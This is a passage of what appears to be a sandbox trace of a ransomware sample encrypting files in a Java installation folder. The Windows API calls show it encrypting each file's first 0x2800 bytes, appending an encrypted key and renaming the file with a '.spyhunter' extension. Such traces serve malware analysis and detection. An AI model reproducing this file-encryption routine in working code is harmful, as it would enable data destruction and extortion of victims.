(lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2iexp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2iexp.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2iexp.dll.spyhunter")) returned 1 [0174.829] GetProcessHeap () returned 0x2c0000 [0174.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.829] GetProcessHeap () returned 0x2c0000 [0174.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.829] GetProcessHeap () returned 0x2c0000 [0174.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed28a8 | out: hHeap=0x2c0000) returned 1 [0174.829] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e548 | out: pbBuffer=0x57e548) returned 1 [0174.829] GetProcessHeap () returned 0x2c0000 [0174.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e540*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e540*=0x30) returned 1 [0174.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.830] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll") returned 48 [0174.830] StrStrW (lpFirst="jfr.dll", lpSrch=".txt") returned 0x0 [0174.830] GetProcessHeap () returned 0x2c0000 [0174.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.830] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e504*=0x2800, lpOverlapped=0x0) returned 1 [0174.835] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.835] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e504*=0x2800, lpOverlapped=0x0) returned 1 [0174.835] GetProcessHeap () returned 0x2c0000 [0174.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.835] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.835] WriteFile (in: hFile=0x178, lpBuffer=0x57e544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x57e544*, lpNumberOfBytesWritten=0x57e504*=0x4, lpOverlapped=0x0) returned 1 [0174.835] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e504*=0x30, lpOverlapped=0x0) returned 1 [0174.835] CloseHandle (hObject=0x178) returned 1 [0174.836] GetProcessHeap () returned 0x2c0000 [0174.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.836] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll.spyhunter") returned 58 [0174.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfr.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfr.dll.spyhunter")) returned 1 [0174.838] GetProcessHeap () returned 0x2c0000 [0174.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.838] GetProcessHeap () returned 0x2c0000 [0174.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0174.838] GetProcessHeap () returned 0x2c0000 [0174.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20de0 | out: hHeap=0x2c0000) returned 1 [0174.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e548 | out: pbBuffer=0x57e548) returned 1 [0174.838] GetProcessHeap () returned 0x2c0000 [0174.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0174.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e540*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e540*=0x30) returned 1 [0174.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdbcodbc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0174.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll") returned 53 [0174.839] StrStrW (lpFirst="JdbcOdbc.dll", lpSrch=".txt") returned 0x0 [0174.839] GetProcessHeap () returned 0x2c0000 [0174.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.840] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e504*=0x2800, lpOverlapped=0x0) returned 1 [0174.957] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.957] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e504*=0x2800, lpOverlapped=0x0) returned 1 [0174.957] GetProcessHeap () returned 0x2c0000 [0174.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.958] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.958] WriteFile (in: hFile=0x178, lpBuffer=0x57e544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x57e544*, lpNumberOfBytesWritten=0x57e504*=0x4, lpOverlapped=0x0) returned 1 [0175.016] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e504, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e504*=0x30, lpOverlapped=0x0) returned 1 [0175.016] CloseHandle (hObject=0x178) returned 1 [0175.016] GetProcessHeap () returned 0x2c0000 [0175.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.016] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll.spyhunter") returned 63 [0175.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdbcodbc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JdbcOdbc.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdbcodbc.dll.spyhunter")) returned 1 [0175.017] GetProcessHeap () returned 0x2c0000 [0175.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.017] GetProcessHeap () returned 0x2c0000 [0175.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.017] GetProcessHeap () returned 0x2c0000 [0175.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2680 | out: hHeap=0x2c0000) returned 1 [0175.017] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e540 | out: pbBuffer=0x57e540) returned 1 [0175.017] GetProcessHeap () returned 0x2c0000 [0175.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.017] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e538*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e538*=0x30) returned 1 [0175.017] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaaccessbridge-32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.018] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll") returned 64 [0175.018] StrStrW (lpFirst="JavaAccessBridge-32.dll", lpSrch=".txt") returned 0x0 [0175.018] GetProcessHeap () returned 0x2c0000 [0175.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.019] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0175.021] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.022] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0175.022] GetProcessHeap () returned 0x2c0000 [0175.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.022] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.022] WriteFile (in: hFile=0x178, lpBuffer=0x57e53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x57e53c*, lpNumberOfBytesWritten=0x57e4fc*=0x4, lpOverlapped=0x0) returned 1 [0175.022] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4fc*=0x30, lpOverlapped=0x0) returned 1 [0175.022] CloseHandle (hObject=0x178) returned 1 [0175.022] GetProcessHeap () returned 0x2c0000 [0175.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.022] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll.spyhunter") returned 74 [0175.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaaccessbridge-32.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaaccessbridge-32.dll.spyhunter")) returned 1 [0175.023] GetProcessHeap () returned 0x2c0000 [0175.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.024] GetProcessHeap () returned 0x2c0000 [0175.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.024] GetProcessHeap () returned 0x2c0000 [0175.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e035a8 | out: hHeap=0x2c0000) returned 1 [0175.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e540 | out: pbBuffer=0x57e540) returned 1 [0175.024] GetProcessHeap () returned 0x2c0000 [0175.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e538*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e538*=0x30) returned 1 [0175.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe") returned 49 [0175.025] StrStrW (lpFirst="java.exe", lpSrch=".txt") returned 0x0 [0175.025] GetProcessHeap () returned 0x2c0000 [0175.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.025] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0175.035] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.036] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4fc*=0x2800, lpOverlapped=0x0) returned 1 [0175.036] GetProcessHeap () returned 0x2c0000 [0175.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.037] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.037] WriteFile (in: hFile=0x178, lpBuffer=0x57e53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x57e53c*, lpNumberOfBytesWritten=0x57e4fc*=0x4, lpOverlapped=0x0) returned 1 [0175.038] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4fc*=0x30, lpOverlapped=0x0) returned 1 [0175.038] CloseHandle (hObject=0x178) returned 1 [0175.039] GetProcessHeap () returned 0x2c0000 [0175.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.039] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe.spyhunter") returned 59 [0175.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.exe.spyhunter")) returned 1 [0175.040] GetProcessHeap () returned 0x2c0000 [0175.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.040] GetProcessHeap () returned 0x2c0000 [0175.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.040] GetProcessHeap () returned 0x2c0000 [0175.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20a70 | out: hHeap=0x2c0000) returned 1 [0175.041] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e538 | out: pbBuffer=0x57e538) returned 1 [0175.041] GetProcessHeap () returned 0x2c0000 [0175.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.041] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e530*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e530*=0x30) returned 1 [0175.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java-rmi.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.042] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe") returned 53 [0175.042] StrStrW (lpFirst="java-rmi.exe", lpSrch=".txt") returned 0x0 [0175.042] GetProcessHeap () returned 0x2c0000 [0175.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.042] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4f4*=0x2800, lpOverlapped=0x0) returned 1 [0175.061] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.061] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4f4*=0x2800, lpOverlapped=0x0) returned 1 [0175.061] GetProcessHeap () returned 0x2c0000 [0175.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.061] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.061] WriteFile (in: hFile=0x178, lpBuffer=0x57e534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x57e534*, lpNumberOfBytesWritten=0x57e4f4*=0x4, lpOverlapped=0x0) returned 1 [0175.136] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4f4*=0x30, lpOverlapped=0x0) returned 1 [0175.136] CloseHandle (hObject=0x178) returned 1 [0175.136] GetProcessHeap () returned 0x2c0000 [0175.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.136] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe.spyhunter") returned 63 [0175.136] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java-rmi.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java-rmi.exe.spyhunter")) returned 1 [0175.137] GetProcessHeap () returned 0x2c0000 [0175.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.137] GetProcessHeap () returned 0x2c0000 [0175.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.138] GetProcessHeap () returned 0x2c0000 [0175.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2458 | out: hHeap=0x2c0000) returned 1 [0175.138] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e538 | out: pbBuffer=0x57e538) returned 1 [0175.138] GetProcessHeap () returned 0x2c0000 [0175.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.138] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e530*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e530*=0x30) returned 1 [0175.138] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jaas_nt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.220] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll") returned 52 [0175.220] StrStrW (lpFirst="jaas_nt.dll", lpSrch=".txt") returned 0x0 [0175.220] GetProcessHeap () returned 0x2c0000 [0175.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.221] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4f4*=0x2800, lpOverlapped=0x0) returned 1 [0175.286] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.286] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4f4*=0x2800, lpOverlapped=0x0) returned 1 [0175.286] GetProcessHeap () returned 0x2c0000 [0175.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.287] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.287] WriteFile (in: hFile=0x178, lpBuffer=0x57e534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x57e534*, lpNumberOfBytesWritten=0x57e4f4*=0x4, lpOverlapped=0x0) returned 1 [0175.287] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4f4*=0x30, lpOverlapped=0x0) returned 1 [0175.287] CloseHandle (hObject=0x178) returned 1 [0175.287] GetProcessHeap () returned 0x2c0000 [0175.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.287] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll.spyhunter") returned 62 [0175.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jaas_nt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jaas_nt.dll.spyhunter")) returned 1 [0175.288] GetProcessHeap () returned 0x2c0000 [0175.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.288] GetProcessHeap () returned 0x2c0000 [0175.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0175.288] GetProcessHeap () returned 0x2c0000 [0175.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed22e8 | out: hHeap=0x2c0000) returned 1 [0175.288] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e530 | out: pbBuffer=0x57e530) returned 1 [0175.288] GetProcessHeap () returned 0x2c0000 [0175.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0175.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e528*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e528*=0x30) returned 1 [0175.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glass.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.289] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll") returned 50 [0175.289] StrStrW (lpFirst="glass.dll", lpSrch=".txt") returned 0x0 [0175.289] GetProcessHeap () returned 0x2c0000 [0175.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.289] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4ec*=0x2800, lpOverlapped=0x0) returned 1 [0175.382] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 